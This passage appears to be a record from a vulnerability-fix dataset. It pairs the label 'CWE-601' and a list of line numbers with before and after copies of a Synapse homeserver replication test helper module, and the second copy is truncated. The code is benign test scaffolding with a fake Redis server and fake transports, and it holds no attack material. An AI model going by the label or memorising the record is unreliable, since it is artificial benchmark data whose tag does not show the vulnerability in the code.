340
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
29,
34,
42,
44,
45,
46,
47,
48,
49,
51,
57,
63,
64,
65,
66,
67,
68,
70,
72,
73,
77,
97,
107,
108,
109,
127,
128,
130,
136,
137,
139,
141,
142,
144,
148,
149,
157,
160,
176,
194,
212,
230,
246,
266,
282,
298,
299,
304,
307,
309,
319,
320,
323,
327,
328,
330,
331,
340,
342,
343,
346,
347,
386,
387,
402,
403,
404,
405,
406,
407,
414,
416,
417,
422,
423,
427,
428,
429,
430,
462,
463,
500,
501,
538,
539,
576,
577,
614,
615,
649,
650,
688,
689,
730,
731,
769,
770,
807,
820,
821,
825,
826,
864,
865,
903,
904,
947,
948,
989,
991,
992,
996,
997,
1035,
1036,
1074,
1075,
1116,
1117,
1158,
1159,
1197,
1205,
1206,
1210,
1211,
1249,
1250,
1288,
1289,
1330,
1331,
1375,
1376,
1419,
1420,
1463,
1464,
1504,
1505,
1547,
1548,
1582,
1591,
1592,
1636,
1637,
1673,
1687,
1688,
1690,
1696,
1699,
1700,
1701,
1702,
1745,
1746,
1788,
1789,
1832,
1849,
1850,
1854,
1855,
1856,
1857,
1895,
1896,
1934,
1935,
1976,
1977,
2018,
2019,
2060,
2061,
2099,
2100,
2144,
2145,
2186,
2187,
2228,
2229,
2270,
2271,
2314,
2328,
2329,
2333,
2336,
2337,
2371,
2372,
2406,
2407,
2441,
2442,
2443,
2477,
2478,
2512,
2513,
2553,
2554,
2602,
2603,
2653,
2654,
2688,
2689,
2726,
2727,
2764,
2765,
2799,
2814,
2815,
2817,
2823,
2826,
2831,
2833,
2834,
2868,
2869,
2903,
2904,
2941,
2942,
2979,
2980,
3015,
3016,
3057,
3058,
3060,
3072,
3080,
3081,
3122,
3123,
3176,
3177,
3218,
3219,
3255,
3256,
3294,
3295,
3334,
3335,
3374,
3375,
3402,
3420,
3421,
3425,
3426,
3427,
3429,
3468,
3469,
3510,
3511,
3549,
3550,
3591,
3593,
3594,
3598,
3599,
3600,
3601,
3642,
3643,
3684,
3685,
3726,
3728,
151,
152,
153,
154,
155,
156,
301,
302,
303,
322
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2019 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Any, Callable, List, Optional, Tuple
import attr
from twisted.internet.interfaces import IConsumer, IPullProducer, IReactorTime
from twisted.internet.protocol import Protocol
from twisted.internet.task import LoopingCall
from twisted.web.http import HTTPChannel
from synapse.app.generic_worker import (
GenericWorkerReplicationHandler,
GenericWorkerServer,
)
from synapse.http.server import JsonResource
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource, streams
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import ReplicationStreamProtocolFactory
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
from tests.server import FakeTransport
try:
import hiredis
except ImportError:
hiredis = None
logger = logging.getLogger(__name__)
class BaseStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests of the replication streams"""
# hiredis is an optional dependency so we don't want to require it for running
# the tests.
if not hiredis:
skip = "Requires hiredis"
servlets = [
streams.register_servlets,
]
def prepare(self, reactor, clock, hs):
# build a replication server
server_factory = ReplicationStreamProtocolFactory(hs)
self.streamer = hs.get_replication_streamer()
self.server = server_factory.buildProtocol(None)
# Make a new HomeServer object for the worker
self.reactor.lookups["testserv"] = "1.2.3.4"
self.worker_hs = self.setup_test_homeserver(
http_client=None,
homeserver_to_use=GenericWorkerServer,
config=self._get_worker_hs_config(),
reactor=self.reactor,
)
# Since we use sqlite in memory databases we need to make sure the
# databases objects are the same.
self.worker_hs.get_datastore().db_pool = hs.get_datastore().db_pool
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler
repl_handler = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs, "client", "test", clock, repl_handler,
)
self._client_transport = None
self._server_transport = None
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_app"] = "synapse.app.generic_worker"
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def _build_replication_data_handler(self):
return TestReplicationDataHandler(self.worker_hs)
def reconnect(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def disconnect(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump(0.1)
def handle_http_replication_attempt(self) -> SynapseRequest:
"""Asserts that a connection attempt was made to the master HS on the
HTTP replication port, then proxies it to the master HS object to be
handled.
Returns:
The request object received by master HS.
"""
# We should have an outbound connection attempt.
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, 8765)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
request_factory = OneShotRequestFactory()
# Set up the server side protocol
channel = _PushHTTPChannel(self.reactor)
channel.requestFactory = request_factory
channel.site = self.site
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# The request will now be processed by `self.site` and the response
# streamed back.
self.reactor.advance(0)
# We tear down the connection so it doesn't get reused without our
# knowledge.
server_to_client_transport.loseConnection()
client_to_server_transport.loseConnection()
return request_factory.request
def assert_request_is_get_repl_stream_updates(
self, request: SynapseRequest, stream_name: str
):
"""Asserts that the given request is a HTTP replication request for
fetching updates for given stream.
"""
self.assertRegex(
request.path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (stream_name.encode("ascii"),),
)
self.assertEqual(request.method, b"GET")
class BaseMultiWorkerStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests running multiple workers.
Automatically handle HTTP replication requests from workers to master,
unlike `BaseStreamTestCase`.
"""
servlets = [] # type: List[Callable[[HomeServer, JsonResource], None]]
def setUp(self):
super().setUp()
# build a replication server
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
# Fake in memory Redis server that servers can connect to.
self._redis_server = FakeRedisPubSubServer()
store = self.hs.get_datastore()
self.database_pool = store.db_pool
self.reactor.lookups["testserv"] = "1.2.3.4"
self.reactor.lookups["localhost"] = "127.0.0.1"
# A map from a HS instance to the associated HTTP Site to use for
# handling inbound HTTP requests to that instance.
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
# Handle attempts to connect to fake redis server.
self.reactor.add_tcp_client_callback(
"localhost", 6379, self.connect_any_redis_attempts,
)
self.hs.get_tcp_replication().start_replication(self.hs)
# When we see a connection attempt to the master replication listener we
# automatically set up the connection. This is so that tests don't
# manually have to go and explicitly set it up each time (plus sometimes
# it is impossible to write the handling explicitly in the tests).
#
# Register the master replication listener:
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def create_test_resource(self):
"""Overrides `HomeserverTestCase.create_test_resource`.
"""
# We override this so that it automatically registers all the HTTP
# replication servlets, without having to explicitly do that in all
# subclassses.
resource = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, resource)
return resource
def make_worker_hs(
self, worker_app: str, extra_config: dict = {}, **kwargs
) -> HomeServer:
"""Make a new worker HS instance, correctly connecting replcation
stream to the master HS.
Args:
worker_app: Type of worker, e.g. `synapse.app.federation_sender`.
extra_config: Any extra config to use for this instances.
**kwargs: Options that get passed to `self.setup_test_homeserver`,
useful to e.g. pass some mocks for things like `http_client`
Returns:
The new worker HomeServer instance.
"""
config = self._get_worker_hs_config()
config["worker_app"] = worker_app
config.update(extra_config)
worker_hs = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
config=config,
reactor=self.reactor,
**kwargs,
)
# If the instance is in the `instance_map` config then workers may try
# and send HTTP requests to it, so we register it with
# `_handle_http_replication_attempt` like we do with the master HS.
instance_name = worker_hs.get_instance_name()
instance_loc = worker_hs.config.worker.instance_map.get(instance_name)
if instance_loc:
# Ensure the host is one that has a fake DNS entry.
if instance_loc.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (instance_name, instance_loc.host,)
)
self.reactor.add_tcp_client_callback(
self.reactor.lookups[instance_loc.host],
instance_loc.port,
lambda: self._handle_http_replication_attempt(
worker_hs, instance_loc.port
),
)
store = worker_hs.get_datastore()
store.db_pool._db_pool = self.database_pool._db_pool
# Set up TCP replication between master and the new worker if we don't
# have Redis support enabled.
if not worker_hs.config.redis_enabled:
repl_handler = ReplicationCommandHandler(worker_hs)
client = ClientReplicationStreamProtocol(
worker_hs, "client", "test", self.clock, repl_handler,
)
server = self.server_factory.buildProtocol(None)
client_transport = FakeTransport(server, self.reactor)
client.makeConnection(client_transport)
server_transport = FakeTransport(client, self.reactor)
server.makeConnection(server_transport)
# Set up a resource for the worker
resource = ReplicationRestResource(worker_hs)
for servlet in self.servlets:
servlet(worker_hs, resource)
self._hs_to_site[worker_hs] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
worker_hs.config.server.server_name, worker_hs.get_instance_name()
),
config=worker_hs.config.server.listeners[0],
resource=resource,
server_version_string="1",
)
if worker_hs.config.redis.redis_enabled:
worker_hs.get_tcp_replication().start_replication(worker_hs)
return worker_hs
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump()
def _handle_http_replication_attempt(self, hs, repl_port):
"""Handles a connection attempt to the given HS replication HTTP
listener on the given port.
"""
# We should have at least one outbound connection attempt, where the
# last is one to the HTTP repication IP/port.
clients = self.reactor.tcpClients
self.assertGreaterEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop()
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, repl_port)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
request_factory = OneShotRequestFactory()
# Set up the server side protocol
channel = _PushHTTPChannel(self.reactor)
channel.requestFactory = request_factory
channel.site = self._hs_to_site[hs]
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# Note: at this point we've wired everything up, but we need to return
# before the data starts flowing over the connections as this is called
# inside `connecTCP` before the connection has been passed back to the
# code that requested the TCP connection.
def connect_any_redis_attempts(self):
"""If redis is enabled we need to deal with workers connecting to a
redis server. We don't want to use a real Redis server so we use a
fake one.
"""
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "localhost")
self.assertEqual(port, 6379)
client_protocol = client_factory.buildProtocol(None)
server_protocol = self._redis_server.buildProtocol(None)
client_to_server_transport = FakeTransport(
server_protocol, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, server_protocol
)
server_protocol.makeConnection(server_to_client_transport)
return client_to_server_transport, server_to_client_transport
class TestReplicationDataHandler(GenericWorkerReplicationHandler):
"""Drop-in for ReplicationDataHandler which just collects RDATA rows"""
def __init__(self, hs: HomeServer):
super().__init__(hs)
# list of received (stream_name, token, row) tuples
self.received_rdata_rows = [] # type: List[Tuple[str, int, Any]]
async def on_rdata(self, stream_name, instance_name, token, rows):
await super().on_rdata(stream_name, instance_name, token, rows)
for r in rows:
self.received_rdata_rows.append((stream_name, token, r))
@attr.s()
class OneShotRequestFactory:
"""A simple request factory that generates a single `SynapseRequest` and
stores it for future use. Can only be used once.
"""
request = attr.ib(default=None)
def __call__(self, *args, **kwargs):
assert self.request is None
self.request = SynapseRequest(*args, **kwargs)
return self.request
class _PushHTTPChannel(HTTPChannel):
"""A HTTPChannel that wraps pull producers to push producers.
This is a hack to get around the fact that HTTPChannel transparently wraps a
pull producer (which is what Synapse uses to reply to requests) with
`_PullToPush` to convert it to a push producer. Unfortunately `_PullToPush`
uses the standard reactor rather than letting us use our test reactor, which
makes it very hard to test.
"""
def __init__(self, reactor: IReactorTime):
super().__init__()
self.reactor = reactor
self._pull_to_push_producer = None # type: Optional[_PullToPushProducer]
def registerProducer(self, producer, streaming):
# Convert pull producers to push producer.
if not streaming:
self._pull_to_push_producer = _PullToPushProducer(
self.reactor, producer, self
)
producer = self._pull_to_push_producer
super().registerProducer(producer, True)
def unregisterProducer(self):
if self._pull_to_push_producer:
# We need to manually stop the _PullToPushProducer.
self._pull_to_push_producer.stop()
def checkPersistence(self, request, version):
"""Check whether the connection can be re-used
"""
# We hijack this to always say no for ease of wiring stuff up in
# `handle_http_replication_attempt`.
request.responseHeaders.setRawHeaders(b"connection", [b"close"])
return False
class _PullToPushProducer:
"""A push producer that wraps a pull producer.
"""
def __init__(
self, reactor: IReactorTime, producer: IPullProducer, consumer: IConsumer
):
self._clock = Clock(reactor)
self._producer = producer
self._consumer = consumer
# While running we use a looping call with a zero delay to call
# resumeProducing on given producer.
self._looping_call = None # type: Optional[LoopingCall]
# We start writing next reactor tick.
self._start_loop()
def _start_loop(self):
"""Start the looping call to
"""
if not self._looping_call:
# Start a looping call which runs every tick.
self._looping_call = self._clock.looping_call(self._run_once, 0)
def stop(self):
"""Stops calling resumeProducing.
"""
if self._looping_call:
self._looping_call.stop()
self._looping_call = None
def pauseProducing(self):
"""Implements IPushProducer
"""
self.stop()
def resumeProducing(self):
"""Implements IPushProducer
"""
self._start_loop()
def stopProducing(self):
"""Implements IPushProducer
"""
self.stop()
self._producer.stopProducing()
def _run_once(self):
"""Calls resumeProducing on producer once.
"""
try:
self._producer.resumeProducing()
except Exception:
logger.exception("Failed to call resumeProducing")
try:
self._consumer.unregisterProducer()
except Exception:
pass
self.stopProducing()
class FakeRedisPubSubServer:
"""A fake Redis server for pub/sub.
"""
def __init__(self):
self._subscribers = set()
def add_subscriber(self, conn):
"""A connection has called SUBSCRIBE
"""
self._subscribers.add(conn)
def remove_subscriber(self, conn):
"""A connection has called UNSUBSCRIBE
"""
self._subscribers.discard(conn)
def publish(self, conn, channel, msg) -> int:
"""A connection want to publish a message to subscribers.
"""
for sub in self._subscribers:
sub.send(["message", channel, msg])
return len(self._subscribers)
def buildProtocol(self, addr):
return FakeRedisPubSubProtocol(self)
class FakeRedisPubSubProtocol(Protocol):
"""A connection from a client talking to the fake Redis server.
"""
def __init__(self, server: FakeRedisPubSubServer):
self._server = server
self._reader = hiredis.Reader()
def dataReceived(self, data):
self._reader.feed(data)
# We might get multiple messages in one packet.
while True:
msg = self._reader.gets()
if msg is False:
# No more messages.
return
if not isinstance(msg, list):
# Inbound commands should always be a list
raise Exception("Expected redis list")
self.handle_command(msg[0], *msg[1:])
def handle_command(self, command, *args):
"""Received a Redis command from the client.
"""
# We currently only support pub/sub.
if command == b"PUBLISH":
channel, message = args
num_subscribers = self._server.publish(self, channel, message)
self.send(num_subscribers)
elif command == b"SUBSCRIBE":
(channel,) = args
self._server.add_subscriber(self)
self.send(["subscribe", channel, 1])
else:
raise Exception("Unknown command")
def send(self, msg):
"""Send a message back to the client.
"""
raw = self.encode(msg).encode("utf-8")
self.transport.write(raw)
self.transport.flush()
def encode(self, obj):
"""Encode an object to its Redis format.
Supports: strings/bytes, integers and list/tuples.
"""
if isinstance(obj, bytes):
# We assume bytes are just unicode strings.
obj = obj.decode("utf-8")
if isinstance(obj, str):
return "${len}\r\n{str}\r\n".format(len=len(obj), str=obj)
if isinstance(obj, int):
return ":{val}\r\n".format(val=obj)
if isinstance(obj, (list, tuple)):
items = "".join(self.encode(a) for a in obj)
return "*{len}\r\n{items}".format(len=len(obj), items=items)
raise Exception("Unrecognized type for encoding redis: %r: %r", type(obj), obj)
def connectionLost(self, reason):
self._server.remove_subscriber(self)
| # -*- coding: utf-8 -*-
# Copyright 2019 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Any, Callable, List, Optional, Tuple
import attr
from twisted.internet.interfaces import IConsumer, IPullProducer, IReactorTime
from twisted.internet.protocol import Protocol
from twisted.internet.task import LoopingCall
from twisted.web.http import HTTPChannel
from synapse.app.generic_worker import (
GenericWorkerReplicationHandler,
GenericWorkerServer,
)
from synapse.http.server import JsonResource
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource, streams
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import ReplicationStreamProtocolFactory
from synapse.server import HomeServer
from synapse.util import Clock
from tests import unittest
from tests.server import FakeTransport
try:
import hiredis
except ImportError:
hiredis = None
logger = logging.getLogger(__name__)
class BaseStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests of the replication streams"""
# hiredis is an optional dependency so we don't want to require it for running
# the tests.
if not hiredis:
skip = "Requires hiredis"
servlets = [
streams.register_servlets,
]
def prepare(self, reactor, clock, hs):
# build a replication server
server_factory = ReplicationStreamProtocolFactory(hs)
self.streamer = hs.get_replication_streamer()
self.server = server_factory.buildProtocol(None)
# Make a new HomeServer object for the worker
self.reactor.lookups["testserv"] = "1.2.3.4"
self.worker_hs = self.setup_test_homeserver(
federation_http_client=None,
homeserver_to_use=GenericWorkerServer,
config=self._get_worker_hs_config(),
reactor=self.reactor,
)
# Since we use sqlite in memory databases we need to make sure the
# databases objects are the same.
self.worker_hs.get_datastore().db_pool = hs.get_datastore().db_pool
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler
repl_handler = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs, "client", "test", clock, repl_handler,
)
self._client_transport = None
self._server_transport = None
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_app"] = "synapse.app.generic_worker"
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def _build_replication_data_handler(self):
return TestReplicationDataHandler(self.worker_hs)
def reconnect(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def disconnect(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump(0.1)
def handle_http_replication_attempt(self) -> SynapseRequest:
"""Asserts that a connection attempt was made to the master HS on the
HTTP replication port, then proxies it to the master HS object to be
handled.
Returns:
The request object received by master HS.
"""
# We should have an outbound connection attempt.
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, 8765)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
request_factory = OneShotRequestFactory()
# Set up the server side protocol
channel = _PushHTTPChannel(self.reactor)
channel.requestFactory = request_factory
channel.site = self.site
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# The request will now be processed by `self.site` and the response
# streamed back.
self.reactor.advance(0)
# We tear down the connection so it doesn't get reused without our
# knowledge.
server_to_client_transport.loseConnection()
client_to_server_transport.loseConnection()
return request_factory.request
def assert_request_is_get_repl_stream_updates(
self, request: SynapseRequest, stream_name: str
):
"""Asserts that the given request is a HTTP replication request for
fetching updates for given stream.
"""
self.assertRegex(
request.path,
br"^/_synapse/replication/get_repl_stream_updates/%s/[^/]+$"
% (stream_name.encode("ascii"),),
)
self.assertEqual(request.method, b"GET")
class BaseMultiWorkerStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests running multiple workers.
Automatically handle HTTP replication requests from workers to master,
unlike `BaseStreamTestCase`.
"""
servlets = [] # type: List[Callable[[HomeServer, JsonResource], None]]
def setUp(self):
super().setUp()
# build a replication server
self.server_factory = ReplicationStreamProtocolFactory(self.hs)
self.streamer = self.hs.get_replication_streamer()
# Fake in memory Redis server that servers can connect to.
self._redis_server = FakeRedisPubSubServer()
store = self.hs.get_datastore()
self.database_pool = store.db_pool
self.reactor.lookups["testserv"] = "1.2.3.4"
self.reactor.lookups["localhost"] = "127.0.0.1"
# A map from a HS instance to the associated HTTP Site to use for
# handling inbound HTTP requests to that instance.
self._hs_to_site = {self.hs: self.site}
if self.hs.config.redis.redis_enabled:
# Handle attempts to connect to fake redis server.
self.reactor.add_tcp_client_callback(
"localhost", 6379, self.connect_any_redis_attempts,
)
self.hs.get_tcp_replication().start_replication(self.hs)
# When we see a connection attempt to the master replication listener we
# automatically set up the connection. This is so that tests don't
# manually have to go and explicitly set it up each time (plus sometimes
# it is impossible to write the handling explicitly in the tests).
#
# Register the master replication listener:
self.reactor.add_tcp_client_callback(
"1.2.3.4",
8765,
lambda: self._handle_http_replication_attempt(self.hs, 8765),
)
def create_test_resource(self):
"""Overrides `HomeserverTestCase.create_test_resource`.
"""
# We override this so that it automatically registers all the HTTP
# replication servlets, without having to explicitly do that in all
# subclassses.
resource = ReplicationRestResource(self.hs)
for servlet in self.servlets:
servlet(self.hs, resource)
return resource
def make_worker_hs(
self, worker_app: str, extra_config: dict = {}, **kwargs
) -> HomeServer:
"""Make a new worker HS instance, correctly connecting replcation
stream to the master HS.
Args:
worker_app: Type of worker, e.g. `synapse.app.federation_sender`.
extra_config: Any extra config to use for this instances.
**kwargs: Options that get passed to `self.setup_test_homeserver`,
useful to e.g. pass some mocks for things like `federation_http_client`
Returns:
The new worker HomeServer instance.
"""
config = self._get_worker_hs_config()
config["worker_app"] = worker_app
config.update(extra_config)
worker_hs = self.setup_test_homeserver(
homeserver_to_use=GenericWorkerServer,
config=config,
reactor=self.reactor,
**kwargs,
)
# If the instance is in the `instance_map` config then workers may try
# and send HTTP requests to it, so we register it with
# `_handle_http_replication_attempt` like we do with the master HS.
instance_name = worker_hs.get_instance_name()
instance_loc = worker_hs.config.worker.instance_map.get(instance_name)
if instance_loc:
# Ensure the host is one that has a fake DNS entry.
if instance_loc.host not in self.reactor.lookups:
raise Exception(
"Host does not have an IP for instance_map[%r].host = %r"
% (instance_name, instance_loc.host,)
)
self.reactor.add_tcp_client_callback(
self.reactor.lookups[instance_loc.host],
instance_loc.port,
lambda: self._handle_http_replication_attempt(
worker_hs, instance_loc.port
),
)
store = worker_hs.get_datastore()
store.db_pool._db_pool = self.database_pool._db_pool
# Set up TCP replication between master and the new worker if we don't
# have Redis support enabled.
if not worker_hs.config.redis_enabled:
repl_handler = ReplicationCommandHandler(worker_hs)
client = ClientReplicationStreamProtocol(
worker_hs, "client", "test", self.clock, repl_handler,
)
server = self.server_factory.buildProtocol(None)
client_transport = FakeTransport(server, self.reactor)
client.makeConnection(client_transport)
server_transport = FakeTransport(client, self.reactor)
server.makeConnection(server_transport)
# Set up a resource for the worker
resource = ReplicationRestResource(worker_hs)
for servlet in self.servlets:
servlet(worker_hs, resource)
self._hs_to_site[worker_hs] = SynapseSite(
logger_name="synapse.access.http.fake",
site_tag="{}-{}".format(
worker_hs.config.server.server_name, worker_hs.get_instance_name()
),
config=worker_hs.config.server.listeners[0],
resource=resource,
server_version_string="1",
)
if worker_hs.config.redis.redis_enabled:
worker_hs.get_tcp_replication().start_replication(worker_hs)
return worker_hs
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump()
def _handle_http_replication_attempt(self, hs, repl_port):
"""Handles a connection attempt to the given HS replication HTTP
listener on the given port.
"""
# We should have at least one outbound connection attempt, where the
# last is one to the HTTP repication IP/port.
clients = self.reactor.tcpClients
self.assertGreaterEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop()
self.assertEqual(host, "1.2.3.4")
self.assertEqual(port, repl_port)
# Set up client side protocol
client_protocol = client_factory.buildProtocol(None)
request_factory = OneShotRequestFactory()
# Set up the server side protocol
channel = _PushHTTPChannel(self.reactor)
channel.requestFactory = request_factory
channel.site = self._hs_to_site[hs]
# Connect client to server and vice versa.
client_to_server_transport = FakeTransport(
channel, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, channel
)
channel.makeConnection(server_to_client_transport)
# Note: at this point we've wired everything up, but we need to return
# before the data starts flowing over the connections as this is called
# inside `connecTCP` before the connection has been passed back to the
# code that requested the TCP connection.
def connect_any_redis_attempts(self):
"""If redis is enabled we need to deal with workers connecting to a
redis server. We don't want to use a real Redis server so we use a
fake one.
"""
clients = self.reactor.tcpClients
self.assertEqual(len(clients), 1)
(host, port, client_factory, _timeout, _bindAddress) = clients.pop(0)
self.assertEqual(host, "localhost")
self.assertEqual(port, 6379)
client_protocol = client_factory.buildProtocol(None)
server_protocol = self._redis_server.buildProtocol(None)
client_to_server_transport = FakeTransport(
server_protocol, self.reactor, client_protocol
)
client_protocol.makeConnection(client_to_server_transport)
server_to_client_transport = FakeTransport(
client_protocol, self.reactor, server_protocol
)
server_protocol.makeConnection(server_to_client_transport)
return client_to_server_transport, server_to_client_transport
class TestReplicationDataHandler(GenericWorkerReplicationHandler):
"""Drop-in for ReplicationDataHandler which just collects RDATA rows"""
def __init__(self, hs: HomeServer):
super().__init__(hs)
# list of received (stream_name, token, row) tuples
self.received_rdata_rows = [] # type: List[Tuple[str, int, Any]]
async def on_rdata(self, stream_name, instance_name, token, rows):
await super().on_rdata(stream_name, instance_name, token, rows)
for r in rows:
self.received_rdata_rows.append((stream_name, token, r))
@attr.s()
class OneShotRequestFactory:
"""A simple request factory that generates a single `SynapseRequest` and
stores it for future use. Can only be used once.
"""
request = attr.ib(default=None)
def __call__(self, *args, **kwargs):
assert self.request is None
self.request = SynapseRequest(*args, **kwargs)
return self.request
class _PushHTTPChannel(HTTPChannel):
"""A HTTPChannel that wraps pull producers to push producers.
This is a hack to get around the fact that HTTPChannel transparently wraps a
pull producer (which is what Synapse uses to reply to requests) with
`_PullToPush` to convert it to a push producer. Unfortunately `_PullToPush`
uses the standard reactor rather than letting us use our test reactor, which
makes it very hard to test.
"""
def __init__(self, reactor: IReactorTime):
super().__init__()
self.reactor = reactor
self._pull_to_push_producer = None # type: Optional[_PullToPushProducer]
def registerProducer(self, producer, streaming):
# Convert pull producers to push producer.
if not streaming:
self._pull_to_push_producer = _PullToPushProducer(
self.reactor, producer, self
)
producer = self._pull_to_push_producer
super().registerProducer(producer, True)
def unregisterProducer(self):
if self._pull_to_push_producer:
# We need to manually stop the _PullToPushProducer.
self._pull_to_push_producer.stop()
def checkPersistence(self, request, version):
"""Check whether the connection can be re-used
"""
# We hijack this to always say no for ease of wiring stuff up in
# `handle_http_replication_attempt`.
request.responseHeaders.setRawHeaders(b"connection", [b"close"])
return False
class _PullToPushProducer:
"""A push producer that wraps a pull producer.
"""
def __init__(
self, reactor: IReactorTime, producer: IPullProducer, consumer: IConsumer
):
self._clock = Clock(reactor)
self._producer = producer
self._consumer = consumer
# While running we use a looping call with a zero delay to call
# resumeProducing on given producer.
self._looping_call = None # type: Optional[LoopingCall]
# We start writing next reactor tick.
self._start_loop()
def _start_loop(self):
"""Start the looping call to
"""
if not self._looping_call:
# Start a looping call which runs every tick.
self._looping_call = self._clock.looping_call(self._run_once, 0)
def stop(self):
"""Stops calling resumeProducing.
"""
if self._looping_call:
self._looping_call.stop()
self._looping_call = None
def pauseProducing(self):
"""Implements IPushProducer
"""
self.stop()
def resumeProducing(self):
"""Implements IPushProducer
"""
self._start_loop()
def stopProducing(self):
"""Implements IPushProducer
"""
self.stop()
self._producer.stopProducing()
def _run_once(self):
"""Calls resumeProducing on producer once.
"""
try:
self._producer.resumeProducing()
except Exception:
logger.exception("Failed to call resumeProducing")
try:
self._consumer.unregisterProducer()
